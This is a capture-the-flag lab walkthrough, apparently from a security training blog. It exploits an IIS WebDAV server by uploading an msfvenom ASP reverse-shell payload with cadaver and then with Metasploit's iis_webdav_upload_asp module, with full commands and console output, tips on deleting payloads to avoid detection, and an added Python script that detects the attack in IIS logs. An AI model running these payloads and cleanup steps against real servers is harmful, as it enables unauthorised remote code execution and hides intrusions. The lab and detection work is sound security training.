Exploiting WebDAV With Metasploit

Posted by r3kind1e on September 11, 2022

Demo: Exploiting WebDAV With Metasploit

Target IP Address: 10.2.30.233

nmap -sV -p 80 --script=http-enum 10.2.30.233

10.2.30.233/webdav

bob
password_123321

How to obtain a Meterpreter session or a reverse shell on the target system with Metasploit.

Generating the ASP payload ourselves with msfvenom.

Msfvenom is a tool that generates payloads which provide a reverse shell and remote access to the target system. In this case we are going to obtain a Meterpreter session, an advanced reverse shell that lets us perform additional functions such as uploading files to and downloading files from the target.

In order to generate the ASP payload:

-p: the payload; we use windows/meterpreter/reverse_tcp, which is a staged payload.

LHOST: our own IP address (find it with ifconfig); the address the payload connects back to when it is executed.

LPORT: the port the payload connects back to.

-f: the output file format.

msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.10.5.2 LPORT=1234 -f asp > shell.asp

The payload is generated successfully, with the architecture set to x86 (32-bit). It is recommended to use the 32-bit Meterpreter payload here, primarily because if you are not familiar with or not sure of the target operating system's architecture, the 32-bit payload works whether the system is 32-bit or 64-bit.

ls

shell.asp
cadaver http://10.2.30.233/webdav

dav:/webdav/> ls
dav:/webdav/> put /root/shell.asp

Refresh the page in the browser and shell.asp is now listed.

The next step is to click on it to execute it, but before executing it we need to set up a listener, or rather a handler, that will receive the reverse connection from the target system and then send the stage that provides us with a Meterpreter session.

To do this we need to start a Metasploit console session. First we start the PostgreSQL database service, because the Metasploit console requires the Metasploit Framework database to be running.

service postgresql start && msfconsole

In order to set up the handler:

msf6 > use multi/handler

This is a Metasploit module that is used to set up a listener for the malicious payload you have created.

The payload we used to generate the malicious ASP file was:

msf6 exploit(multi/handler) > set payload windows/meterpreter/reverse_tcp

This has to be the same payload you specified when generating the ASP file with msfvenom. Make sure the payload you set here is the same one you used to generate the ASP file.

Remember that LHOST and LPORT are also the same options you used when generating the malicious ASP payload with msfvenom.

run starts the listener, or rather the reverse TCP handler, which now waits for a connection from the ASP payload we generated. When we execute the payload on the target, it connects back to this particular reverse TCP handler.

msf6 exploit(multi/handler) > show options
msf6 exploit(multi/handler) > set LHOST 10.10.5.2
msf6 exploit(multi/handler) > set LPORT 1234
msf6 exploit(multi/handler) > run

To execute it, head back to the /webdav/ directory and click on shell.asp. It has now been executed.

Back in the terminal you can see that it is sending the stage and then reports that Meterpreter session 1 opened: we have successfully gained access to the target system.

meterpreter > sysinfo

Get our current privileges:

meterpreter > getuid
meterpreter > exit
msf6 exploit(multi/handler) > sessions

This is one technique you can use: go through the process of generating the payload and manually uploading it with cadaver.

There is another technique, which uses a Metasploit Framework module that automates this entire process.

The module uploads a Meterpreter ASP file to the WebDAV server automatically and provides us with a Meterpreter session.

Microsoft IIS WebDAV Write Access Code Execution

This module can be used to execute a payload on IIS servers that have world-writeable directories. The payload is uploaded as an ASP script via a WebDAV PUT request. The target IIS machine must meet these conditions to be considered as exploitable: it allows 'Script resource access', Read and Write permission, and supports ASP.

The module starts a reverse TCP handler and checks the WebDAV share. It generates a new ASP file, authenticates, and once authentication succeeds it uploads the ASP payload as a .txt file, renames it to an .asp file, executes the ASP payload, and then deletes the payload for you to avoid detection. You can see it send the stage and open a Meterpreter session.

msf6 exploit(multi/handler) > search iis upload
msf6 exploit(multi/handler) > use exploit/windows/iis/iis_webdav_upload_asp
msf6 exploit(windows/iis/iis_webdav_upload_asp) > show options
msf6 exploit(windows/iis/iis_webdav_upload_asp) > set HttpUsername bob
msf6 exploit(windows/iis/iis_webdav_upload_asp) > set HttpPassword password_123321
msf6 exploit(windows/iis/iis_webdav_upload_asp) > set RHOSTS 10.2.30.233
msf6 exploit(windows/iis/iis_webdav_upload_asp) > set PATH /webdav/metasploit.asp
msf6 exploit(windows/iis/iis_webdav_upload_asp) > exploit
meterpreter > sysinfo
meterpreter > getuid

If you head into /webdav/, you can see that the module actually deleted the ASP payload it generated.

10.2.30.233/webdav/

You can also delete files with the cadaver utility; here we delete the shell.asp file that we uploaded manually.

dav:/webdav/> help
dav:/webdav/> delete shell.asp
dav:/webdav/> ls

This is recommended: once you have gained access to the target system, delete any payloads or exploit files you uploaded to the target, because they are easy to detect.

dav:/webdav/> ls
Listing collection `/webdav/': succeeded.
        AttackDefense.txt                     49  Jan  4  2021
        shell.asp                          38437  Sep 11 17:14
        web.config                           168  Jan  4  2021
dav:/webdav/> delete shell.asp
Deleting `shell.asp': succeeded.
dav:/webdav/> ls
Listing collection `/webdav/': succeeded.
        AttackDefense.txt                     49  Jan  4  2021
        web.config                           168  Jan  4  2021

Windows: IIS Server: WebDav Metasploit

Overview

You are given a Kali GUI machine and a vulnerable target machine. The IP address of the target machine is provided in a text file named target on the Kali machine's desktop (/root/Desktop/target).

Your task is to fingerprint the service using the tools available on the Kali machine and to exploit it with Metasploit.

Objective: exploit the service and retrieve the flag!

The following username and password can be used to access the service:

Username  Password
bob       password_123321

Instructions:

  • Your Kali machine has an interface with IP address 10.10.X.Y. Run "ip addr" to find the values of X and Y.
  • The IP address of the target machine is given in the file "/root/Desktop/target". Do not attack the gateways at IP addresses 192.V.W1 and 10.10.X.1.

My own approach

Target IP Address : 10.0.20.119

root@attackdefense:~# nmap -sV -p 80 --script=http-enum 10.0.20.119
Starting Nmap 7.91 ( https://nmap.org ) at 2022-09-11 14:15 IST
Nmap scan report for 10.0.20.119
Host is up (0.0037s latency).

PORT   STATE SERVICE VERSION
80/tcp open  http    Microsoft IIS httpd 10.0
| http-enum: 
|_  /webdav/: Potentially interesting folder (401 Unauthorized)
|_http-server-header: Microsoft-IIS/10.0
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 27.94 seconds

http://10.0.20.119/webdav/

bob
password_123321

How to obtain a Meterpreter session or a reverse shell on the target system with Metasploit.

Generating the ASP payload ourselves with msfvenom.

Msfvenom is a tool that lets you generate payloads that give you a reverse shell and remote access to the target system. In this case we will obtain a Meterpreter session, an advanced reverse shell that lets us perform additional functions such as uploading files to and downloading files from the target.

To generate the ASP payload:

-p: the payload; we use windows/meterpreter/reverse_tcp, which is a staged payload.

LHOST: our IP address (find it with ifconfig); the IP the payload connects to when it is executed.

LPORT: the port the payload connects to.

-f: the file format.

root@attackdefense:~# ifconfig
eth0: flags=4163<UP,BROADCAST,RUNNING,MULTICAST>  mtu 1500
        inet 10.1.0.38  netmask 255.255.0.0  broadcast 10.1.255.255
        ether 02:42:0a:01:00:26  txqueuelen 0  (Ethernet)
        RX packets 22326  bytes 1742578 (1.6 MiB)
        RX errors 0  dropped 0  overruns 0  frame 0
        TX packets 18859  bytes 5174513 (4.9 MiB)
        TX errors 0  dropped 0 overruns 0  carrier 0  collisions 0

eth1: flags=4163<UP,BROADCAST,RUNNING,MULTICAST>  mtu 1500
        inet 10.10.21.3  netmask 255.255.255.0  broadcast 10.10.21.255
        ether 02:42:0a:0a:15:03  txqueuelen 0  (Ethernet)
        RX packets 5751  bytes 2519693 (2.4 MiB)
        RX errors 0  dropped 0  overruns 0  frame 0
        TX packets 7852  bytes 847246 (827.3 KiB)
        TX errors 0  dropped 0 overruns 0  carrier 0  collisions 0

lo: flags=73<UP,LOOPBACK,RUNNING>  mtu 65536
        inet 127.0.0.1  netmask 255.0.0.0
        loop  txqueuelen 1000  (Local Loopback)
        RX packets 119486  bytes 114743248 (109.4 MiB)
        RX errors 0  dropped 0  overruns 0  frame 0
        TX packets 119486  bytes 114743248 (109.4 MiB)
        TX errors 0  dropped 0 overruns 0  carrier 0  collisions 0
root@kali:~# msfvenom -h
Error: MsfVenom - a Metasploit standalone payload generator.
Also a replacement for msfpayload and msfencode.
Usage: /usr/bin/msfvenom [options]

Options:
    -p, --payload Payload to use. Specify a '-' or stdin to use custom payloads
        --payload-options List the payload's standard options
    -l, --list [type] List a module type. Options are: payloads, encoders, nops, all
    -n, --nopsled Prepend a nopsled of [length] size on to the payload
    -f, --format Output format (use --help-formats for a list)
        --help-formats List available formats
    -e, --encoder The encoder to use
    -a, --arch The architecture to use
        --platform The platform of the payload
        --help-platforms List available platforms
    -s, --space The maximum size of the resulting payload
        --encoder-space The maximum size of the encoded payload (defaults to the -s value)
    -b, --bad-chars The list of characters to avoid example: '\x00\xff'
    -i, --iterations The number of times to encode the payload
    -c, --add-code Specify an additional win32 shellcode file to include
    -x, --template Specify a custom executable file to use as a template
    -k, --keep Preserve the template behavior and inject the payload as a new thread
    -o, --out Save the payload
    -v, --var-name Specify a custom variable name to use for certain output formats
        --smallest Generate the smallest possible payload
    -h, --help Show this message

The payload was generated successfully, with the architecture set to x86 (32-bit). It is always recommended to use the 32-bit Meterpreter payload here, mainly because if you are unfamiliar with or unsure of the target operating system's architecture, the 32-bit payload works whether the system is 32-bit or 64-bit.

root@attackdefense:~# msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.10.21.3 LPORT=1234 -f asp -o shell.asp
[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
[-] No arch selected, selecting arch: x86 from the payload
No encoder specified, outputting raw payload
Payload size: 354 bytes
Final size of asp file: 38254 bytes
Saved as: shell.asp
root@attackdefense:~# ls
Desktop  impacket  shell.asp  thinclient_drives
root@attackdefense:~# pwd
/root
root@attackdefense:~# cadaver http://10.0.20.119/webdav/
Authentication required for 10.0.20.119 on server `10.0.20.119':
Username: bob
Password: 
dav:/webdav/> ls
Listing collection `/webdav/': succeeded.
        AttackDefense.txt                     49  Jan  4  2021
        web.config                           168  Jan  4  2021
dav:/webdav/> put /root/shell.asp
Uploading /root/shell.asp to `/webdav/shell.asp':
Progress: [=============================>] 100.0% of 38254 bytes succeeded.
dav:/webdav/> ls
Listing collection `/webdav/': succeeded.
        AttackDefense.txt                     49  Jan  4  2021
        shell.asp                          38254  Sep 11 14:47
        web.config                           168  Jan  4  2021

The next step is to click on it and execute it, but before we execute it we need to set up a listener, or a handler, that will receive the reverse connection from the target system and then send the stage that gives us a Meterpreter session when it is executed.

To do this we need to start a Metasploit console session; first we start the postgresql database service, because the Metasploit console needs the Metasploit Framework database to be running.

root@attackdefense:~# service postgresql start && msfconsole

To set up the handler:

msf6 > use multi/handler
[*] Using configured payload generic/shell_reverse_tcp

This is a Metasploit module used to set up a listener for the malicious payload you created.

The payload we used to generate the malicious ASP file was:

windows/meterpreter/reverse_tcp

msf6 exploit(multi/handler) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp

This must be the same payload you specified when generating the ASP file with msfvenom. Make sure the payload you set here is the same one you used to generate the ASP file.

Remember that these are the same options used when generating the malicious ASP payload with msfvenom.

run starts a listener, or more precisely a reverse TCP handler, which now waits for a connection from the ASP payload we generated. So when we execute it on the target, it connects back to this particular reverse TCP handler.

msf6 exploit(multi/handler) > show options

Module options (exploit/multi/handler):

   Name  Current Setting  Required  Description
   ----  ---------------  --------  -----------


Payload options (windows/meterpreter/reverse_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  process          yes       Exit technique (Accepted: '', seh, thread, process, none)
   LHOST                      yes       The listen address (an interface may be specified)
   LPORT     4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Wildcard Target


msf6 exploit(multi/handler) > set LHOST 10.10.21.3
LHOST => 10.10.21.3
msf6 exploit(multi/handler) > set LPORT 1234
LPORT => 1234
msf6 exploit(multi/handler) > run

[*] Started reverse TCP handler on 10.10.21.3:1234 

So to execute it, we go back to the /webdav/ directory and click shell.asp. It has been executed.

If you go back to the terminal, you can see it sending the stage, and it tells us Meterpreter session 1 opened: we have successfully gained access to the target system.

Get our current privileges:

meterpreter > sysinfo
Computer        : AD-IIS
OS              : Windows 2016+ (10.0 Build 17763).
Architecture    : x64
System Language : en_US
Domain          : WORKGROUP
Logged On Users : 2
Meterpreter     : x86/windows
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter > exit
[*] Shutting down Meterpreter...

[*] 10.0.20.119 - Meterpreter session 1 closed.  Reason: Died
msf6 exploit(multi/handler) > sessions

Active sessions
===============

No active sessions.

This is one of the techniques you can use: go through the process of generating the payload and manually uploading it with cadaver.

There is another technique you can use, which essentially involves a Metasploit Framework module that lets us automate the entire process.

It lets us upload a malicious Meterpreter ASP file to the WebDAV server automatically, which then gives us a Meterpreter session.

Microsoft IIS WebDAV Write Access Code Execution

This module can be used to execute a payload on IIS servers that have world-writeable directories. The payload is uploaded as an ASP script via a WebDAV PUT request. The target IIS machine must meet these conditions to be considered as exploitable: It allows ‘Script resource access’, Read and Write permission, and supports ASP.

root@attackdefense:~# msfconsole -q
msf6 > search iis upload

Matching Modules
================

   #  Name                                                             Disclosure Date  Rank       Check  Description
   -  ----                                                             ---------------  ----       -----  -----------
   0  exploit/windows/scada/advantech_webaccess_dashboard_file_upload  2016-02-05       excellent  Yes    Advantech WebAccess Dashboard Viewer uploadImageCommon Arbitrary File Upload
   1  exploit/windows/iis/iis_webdav_upload_asp                        2004-12-31       excellent  No     Microsoft IIS WebDAV Write Access Code Execution
   2  exploit/windows/http/umbraco_upload_aspx                         2012-06-28       excellent  No     Umbraco CMS Remote Command Execution


Interact with a module by name or index. For example info 2, use 2 or use exploit/windows/http/umbraco_upload_aspx
msf6 exploit(multi/handler) > use exploit/windows/iis/iis_webdav_upload_asp
[*] No payload configured, defaulting to windows/meterpreter/reverse_tcp
msf6 exploit(windows/iis/iis_webdav_upload_asp) > show options

Module options (exploit/windows/iis/iis_webdav_upload_asp):

   Name          Current Setting        Required  Description
   ----          ---------------        --------  -----------
   HttpPassword                         no        The HTTP password to specify for authentication
   HttpUsername                         no        The HTTP username to specify for authentication
   METHOD        move                   yes       Move or copy the file on the remote system from .txt -> .asp (Accepted: move, copy)
   PATH          /metasploit%RAND%.asp  yes       The path to attempt to upload
   Proxies                              no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOSTS                               yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
   RPORT         80                     yes       The target port (TCP)
   SSL           false                  no        Negotiate SSL/TLS for outgoing connections
   VHOST                                no        HTTP server virtual host


Payload options (windows/meterpreter/reverse_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  process          yes       Exit technique (Accepted: '', seh, thread, process, none)
   LHOST     10.10.21.3       yes       The listen address (an interface may be specified)
   LPORT     4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Automatic


msf6 exploit(windows/iis/iis_webdav_upload_asp) > set HttpUsername bob
HttpUsername => bob
msf6 exploit(windows/iis/iis_webdav_upload_asp) > set HttpPassword password_123321
HttpPassword => password_123321
msf6 exploit(windows/iis/iis_webdav_upload_asp) > set PATH /webdav/metasploit%RAND%.asp
PATH => /webdav/metasploit%RAND%.asp
msf6 exploit(windows/iis/iis_webdav_upload_asp) > set RHOSTS 10.0.23.9
RHOSTS => 10.0.23.9
msf6 exploit(windows/iis/iis_webdav_upload_asp) > exploit

[*] Started reverse TCP handler on 10.10.21.3:4444 
[*] Checking /webdav/metasploit107509300.asp
[*] Uploading 609508 bytes to /webdav/metasploit107509300.txt...
[*] Moving /webdav/metasploit107509300.txt to /webdav/metasploit107509300.asp...
[*] Executing /webdav/metasploit107509300.asp...
[*] Sending stage (175174 bytes) to 10.0.23.9
[*] Deleting /webdav/metasploit107509300.asp (this doesn't always work)...
[*] Meterpreter session 2 opened (10.10.21.3:4444 -> 10.0.23.9:49805) at 2022-09-11 17:00:46 +0530

meterpreter > sysinfo
Computer        : AD-IIS
OS              : Windows 2016+ (10.0 Build 17763).
Architecture    : x64
System Language : en_US
Domain          : WORKGROUP
Logged On Users : 2
Meterpreter     : x86/windows
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter > search -f flag*
Found 1 result...
    c:\flag.txt (32 bytes)
meterpreter > cat c:\\flag.txt
d3aff16a801b4b7d36b4da1094bee345

This is recommended: once you have gained access to the target system, delete any payloads or exploit files you uploaded to the target, because they are easy to detect.

dav:/webdav/> ls
Listing collection `/webdav/': succeeded.
        AttackDefense.txt                     49  Jan  4  2021
        shell.asp                          38556  Sep 11 16:44
        web.config                           168  Jan  4  2021
dav:/webdav/> help
Available commands: 
 ls         cd         pwd        put        get        mget       mput       
 edit       less       mkcol      cat        delete     rmcol      copy       
 move       lock       unlock     discover   steal      showlocks  version    
 checkin    checkout   uncheckout history    label      propnames  chexec     
 propget    propdel    propset    search     set        open       close      
 echo       quit       unset      lcd        lls        lpwd       logout     
 help       describe   about      
Aliases: rm=delete, mkdir=mkcol, mv=move, cp=copy, more=less, quit=exit=bye
dav:/webdav/> delete shell.asp
Deleting `shell.asp': succeeded.
dav:/webdav/> ls
Listing collection `/webdav/': succeeded.
        AttackDefense.txt                     49  Jan  4  2021
        web.config                           168  Jan  4  2021
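Seen from the IIS side, both techniques above (the manual cadaver PUT of shell.asp and the module's PUT of a .txt, MOVE to .asp, GET to execute, DELETE to clean up) leave the same trace in the web server log. The detection script below is an added example, not part of the original post or of Metasploit: it runs over constructed W3C-style IIS log lines (the field order and the sample entries are assumptions) and flags a successful write to the WebDAV directory that is followed by a GET of a script file there from the same client, plus the cleanup DELETE when present.

```python
import re
from datetime import datetime, timedelta

# Constructed IIS W3C-style log lines (sample data, not from the page). Assumed field order:
# date time s-ip cs-method cs-uri-stem cs-uri-query s-port cs-username c-ip sc-status
SAMPLE_LOG = """\
2022-09-11 09:17:01 10.0.20.119 PROPFIND /webdav/ - 80 bob 10.10.21.3 207
2022-09-11 09:17:05 10.0.20.119 PUT /webdav/metasploit107509300.txt - 80 bob 10.10.21.3 201
2022-09-11 09:17:06 10.0.20.119 MOVE /webdav/metasploit107509300.txt - 80 bob 10.10.21.3 201
2022-09-11 09:17:07 10.0.20.119 GET /webdav/metasploit107509300.asp - 80 - 10.10.21.3 200
2022-09-11 09:17:09 10.0.20.119 DELETE /webdav/metasploit107509300.asp - 80 bob 10.10.21.3 204
2022-09-11 09:20:11 10.0.20.119 GET /index.html - 80 - 10.10.21.7 200
2022-09-11 09:21:00 10.0.20.119 PUT /webdav/notes.txt - 80 bob 10.10.21.9 201
2022-09-11 09:30:00 10.0.20.119 PUT /webdav/shell.asp - 80 bob 10.10.21.5 201
2022-09-11 09:30:20 10.0.20.119 GET /webdav/shell.asp - 80 - 10.10.21.5 200
"""

SCRIPT_EXT = (".asp", ".aspx", ".ashx", ".asmx")  # server-side script types IIS can execute
WRITE_METHODS = {"PUT", "MOVE", "COPY"}           # WebDAV methods that create or rename files
WINDOW = timedelta(minutes=5)                     # how long after a write a GET still counts
LINE_RE = re.compile(r"^(\S+) (\S+) \S+ (\S+) (\S+) \S+ \S+ \S+ (\S+) (\d{3})$")


def parse_w3c(log_text):
    """Turn W3C lines into event dicts, skipping '#' comment lines and malformed lines."""
    events = []
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if m and not line.startswith("#"):
            date, time, method, uri, cip, status = m.groups()
            events.append({"ts": datetime.fromisoformat(f"{date} {time}"), "method": method.upper(),
                           "uri": uri.lower(), "cip": cip, "status": int(status)})
    return sorted(events, key=lambda e: e["ts"])


def detect_webdav_upload_exec(log_text):
    """Return sorted (client_ip, finding, uri) tuples. A MOVE/COPY line only logs the source
    (.txt) name, so the match is per directory: a successful write, then a GET of a script
    file in that directory by the same client, optionally followed by a DELETE of it."""
    events = parse_w3c(log_text)
    findings = set()
    for i, w in enumerate(events):
        if w["method"] not in WRITE_METHODS or w["status"] >= 400:
            continue
        directory = w["uri"].rsplit("/", 1)[0] + "/"
        if w["uri"].endswith(SCRIPT_EXT):  # cadaver-style direct PUT of shell.asp
            findings.add((w["cip"], "script-write", w["uri"]))
        for e in events[i + 1:]:
            if e["ts"] - w["ts"] > WINDOW:
                break
            if (e["cip"] == w["cip"] and e["method"] == "GET" and e["status"] < 400
                    and e["uri"].startswith(directory) and e["uri"].endswith(SCRIPT_EXT)):
                findings.add((w["cip"], "write-then-execute", e["uri"]))
                # Deleting the script right after running it is the module's cleanup step
                if any(d["method"] == "DELETE" and d["uri"] == e["uri"] and d["cip"] == e["cip"]
                       and timedelta(0) <= d["ts"] - e["ts"] <= WINDOW for d in events[i + 1:]):
                    findings.add((w["cip"], "execute-then-delete", e["uri"]))
                break
    return sorted(findings)
```

The plain PUT of notes.txt from 10.10.21.9 produces no finding, because no script in /webdav/ is fetched afterwards; the lab's real W3C logs would also need the Destination header of MOVE requests, which IIS does not log by default, to name the renamed file directly.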

Solution

The solution for this lab can be found in the following manual: https://assets.ine.com/labs/ad-manuals/walkthrough-2319.pdf

davtest
